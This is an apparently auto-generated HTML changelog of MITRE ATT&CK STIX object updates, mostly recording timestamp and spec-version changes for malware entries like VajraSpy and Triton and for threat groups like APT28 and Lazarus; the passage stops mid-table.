+            <tr><td class="diff_next" id="difflib_chg_to4__0"><a href="#difflib_chg_to4__top">t</a></td><td class="diff_header" id="from4_1">1</td><td nowrap="nowrap">[VajraSpy](https://attack.mitre.org/software/S9006)&nbsp;is&nbsp;Andro</td><td class="diff_next"><a href="#difflib_chg_to4__top">t</a></td><td class="diff_header" id="to4_1">1</td><td nowrap="nowrap">[VajraSpy](https://attack.mitre.org/software/S9006)&nbsp;is&nbsp;Andro</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">id&nbsp;malware&nbsp;distributed&nbsp;via&nbsp;trojanized&nbsp;messaging&nbsp;and&nbsp;news&nbsp;app</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">id&nbsp;malware&nbsp;distributed&nbsp;via&nbsp;trojanized&nbsp;messaging&nbsp;and&nbsp;news&nbsp;app</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">lications.&nbsp;It&nbsp;has&nbsp;been&nbsp;used&nbsp;to&nbsp;target&nbsp;individuals&nbsp;in&nbsp;Pakista</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">lications.&nbsp;It&nbsp;has&nbsp;been&nbsp;used&nbsp;to&nbsp;target&nbsp;individuals&nbsp;in&nbsp;Pakista</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">n&nbsp;and&nbsp;India&nbsp;since&nbsp;at&nbsp;least&nbsp;2021&nbsp;and&nbsp;has&nbsp;been&nbsp;delivered&nbsp;throu</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">n&nbsp;and&nbsp;India&nbsp;since&nbsp;at&nbsp;least&nbsp;2021&nbsp;and&nbsp;has&nbsp;been&nbsp;delivered&nbsp;throu</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">gh&nbsp;the&nbsp;Google&nbsp;Play&nbsp;Store,&nbsp;malicious&nbsp;domains,&nbsp;and&nbsp;other&nbsp;uncon</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">gh&nbsp;the&nbsp;Google&nbsp;Play&nbsp;Store,&nbsp;malicious&nbsp;domains,&nbsp;and&nbsp;other&nbsp;uncon</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">trolled&nbsp;distribution&nbsp;channels.&nbsp;[VajraSpy](https://attack.mit</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">trolled&nbsp;distribution&nbsp;channels.&nbsp;[VajraSpy](https://attack.mit</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">re.org/software/S9006)&nbsp;is&nbsp;attributed&nbsp;with&nbsp;high&nbsp;confidence&nbsp;to</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">re.org/software/S9006)&nbsp;is&nbsp;attributed&nbsp;with&nbsp;high&nbsp;confidence&nbsp;to</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;[Patchwork](https://attack.mitre.org/groups/G0040)&nbsp;which&nbsp;ha</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;[Patchwork](https://attack.mitre.org/groups/G0040)&nbsp;which&nbsp;ha</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s&nbsp;used&nbsp;the&nbsp;malware&nbsp;to&nbsp;conduct&nbsp;targeted&nbsp;espionage,&nbsp;primarily&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s&nbsp;used&nbsp;the&nbsp;malware&nbsp;to&nbsp;conduct&nbsp;targeted&nbsp;espionage,&nbsp;primarily&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">against&nbsp;devices&nbsp;in&nbsp;Pakistan.<span class="diff_sub">&nbsp;</span>(Citation:&nbsp;ESET_VajraSpy_Feb202</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">against&nbsp;devices&nbsp;in&nbsp;Pakistan.(Citation:&nbsp;ESET_VajraSpy_Feb2024</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">4)(Citation:&nbsp;ArcticWolf_DroppingElephant_July2025)(Citation:</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">)(Citation:&nbsp;ArcticWolf_DroppingElephant_July2025)(Citation:&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;K7Dhanalakshmi_VajraSpy_April2022)&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">K7Dhanalakshmi_VajraSpy_April2022)&nbsp;</td></tr>
+        </tbody>
+    </table><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 01:32:27.375000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.736000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>description</td><td style='border: 1px solid black;border-collapse: collapse;'>[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan. (Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) </td><td style='border: 1px solid black;border-collapse: collapse;'>[VajraSpy](https://attack.mitre.org/software/S9006) is Android malware distributed via trojanized messaging and news applications. It has been used to target individuals in Pakistan and India since at least 2021 and has been delivered through the Google Play Store, malicious domains, and other uncontrolled distribution channels. [VajraSpy](https://attack.mitre.org/software/S9006) is attributed with high confidence to [Patchwork](https://attack.mitre.org/groups/G0040) which has used the malware to conduct targeted espionage, primarily against devices in Pakistan.(Citation: ESET_VajraSpy_Feb2024)(Citation: ArcticWolf_DroppingElephant_July2025)(Citation: K7Dhanalakshmi_VajraSpy_April2022) </td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[S1045] INCONTROLLER</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:06:34.251000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S0604] Industroyer</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:11:53.057000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.739000+00:00</td></tr></tbody></table></details><hr><h4>[S0372] LockerGoga</h4><p><b>Current version</b>: 2.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 22:21:12.036000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S1006] PLC-Blaster</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 14:17:13.861000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.733000+00:00</td></tr></tbody></table></details><hr><h4>[S1009] Triton</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 20:06:22.741000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.736000+00:00</td></tr></tbody></table></details></details><h2>Groups</h2><h3>enterprise-attack</h3><details><summary>Minor Version Changes</summary><hr><h4>[G0040] Patchwork</h4><p><b>Current version</b>: 1.7</p><p><b>Version changed from</b>: 1.6 → 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 23:13:16.458000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_version</td><td style='border: 1px solid black;border-collapse: collapse;'>1.6</td><td style='border: 1px solid black;border-collapse: collapse;'>1.7</td></tr></tbody></table></details></details><details><summary>Patches</summary><hr><h4>[G0007] APT28</h4><p><b>Current version</b>: 5.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-21 13:20:49.866000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G1044] APT42</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-03-08 18:42:45.320000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G1052] Contagious Interview</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 02:54:55.039000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0046] FIN7</h4><p><b>Current version</b>: 4.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 03:18:58.136000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0117] Fox Kitten</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-01-08 22:00:34.410000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0047] Gamaredon Group</h4><p><b>Current version</b>: 3.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 00:11:03.898000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[G0078] Gorgon Group</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-04-25 14:49:11.522000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G1001] HEXANE</h4><p><b>Current version</b>: 2.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-08-14 15:24:19.141000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0032] Lazarus Group</h4><p><b>Current version</b>: 5.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 01:29:21.748000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0140] LazyScripter</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-11-17 14:12:07.294000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0059] Magic Hound</h4><p><b>Current version</b>: 6.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-11-17 16:17:26.385000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G1009] Moses Staff</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-04-11 00:39:25.190000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0069] MuddyWater</h4><p><b>Current version</b>: 7.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 03:26:57.416000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[G0129] Mustang Panda</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-19 00:11:03.898000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0049] OilRig</h4><p><b>Current version</b>: 5.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th 